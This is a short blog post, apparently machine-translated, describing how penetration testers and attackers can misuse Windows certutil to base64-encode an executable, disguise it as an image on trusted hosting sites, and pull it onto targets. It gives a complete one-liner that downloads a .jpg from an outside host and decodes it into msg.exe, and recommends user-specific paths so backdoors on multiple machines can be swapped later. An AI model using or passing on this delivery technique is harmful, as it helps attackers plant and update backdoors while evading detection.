Long time no update blog, most recently in the course of practice or insight into a lot of things.
Not much to say, just start text.
First talk about certutil particularly used in penetration tests, download files, calculate hash, and base64 encoding, and so on.
Presented here base64 encoding:
certutil.exe -encode .\MSGboxs.exe pop.txt
-encode parameters, files can be encrypted and saved to pop.txt
After generating similar to the following
Again arrange pictures
Then again certutil decryption decryption
File is generated before with the same effect
You can upload pictures to sites such as the security of the site Microsoft, Baidu, microblogging and other difficult to find
Then transfer files through these websites
certutil.exe -urlcache -split -f http://chuantu.xyz/t6/702/1566812284x1031866013.jpg a.jpg && certutil.exe -decode a.jpg msg.exe
The best is to upload on a website with a specific path, such as a user name .jpg http://www.xxx.com/user/
Such images can later be modified directly change the backdoor on multiple targets.
File generation is marked beginning of the end
-----BEGIN CERTIFICATE----- -----END CERTIFICATE-----
It can be used with a number of Web services, which are read directly generate base64 decrypt files on it.
Although concealment is not very high, but in the back door as a transport may well be a strange kinky skills.